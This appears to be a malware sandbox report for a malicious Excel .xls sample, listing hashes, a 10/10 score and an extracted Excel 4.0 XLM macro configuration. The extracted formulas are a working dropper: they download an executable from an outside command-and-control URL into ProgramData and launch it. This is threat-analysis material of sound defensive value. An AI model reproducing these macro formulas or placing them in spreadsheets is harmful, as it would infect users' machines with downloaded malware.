Overview

overview

10

Static

static

10

c10db36f5a...18.xls

windows7-x64

10

c10db36f5a...18.xls

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    c10db36f5a07bd13703226344b43cc1c_JaffaCakes118

  • Size

    106KB

  • MD5

    c10db36f5a07bd13703226344b43cc1c

  • SHA1

    e67cf3ac54881bb4791e903426c3161e50249339

  • SHA256

    c0381b65a09796156de7dfc69e48cd0d16d67a27ced3fd15bc0c86c8d0f97b75

  • SHA512

    c87b70bafa17afddc7cd57c203ef0f93b65223d091507ce509601cb786af19d4475750f65f25bdd0829ed5f86bd0895c13fefd24a89eda13c075ffcf308a7e1f

  • SSDEEP

    1536:nSyEBMOZoVhoy9kKpA6gLc1aeWLXri6m7wBGozFDCTIuYDFo6QzXGfOiLdvkQJY:NOcoy2KpMXrit74lzFOTIT9QGfOiu

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://toliku.com/qmzo.exe

Attributes
  • formulas

    =CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://toliku.com/qmzo.exe","C:\ProgramData\cswzqQf.exe",0,0) =CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","C:\ProgramData\cswzqQf.exe",,0,0) =HALT()

Signatures

Files

  • c10db36f5a07bd13703226344b43cc1c_JaffaCakes118
    .xls windows office2003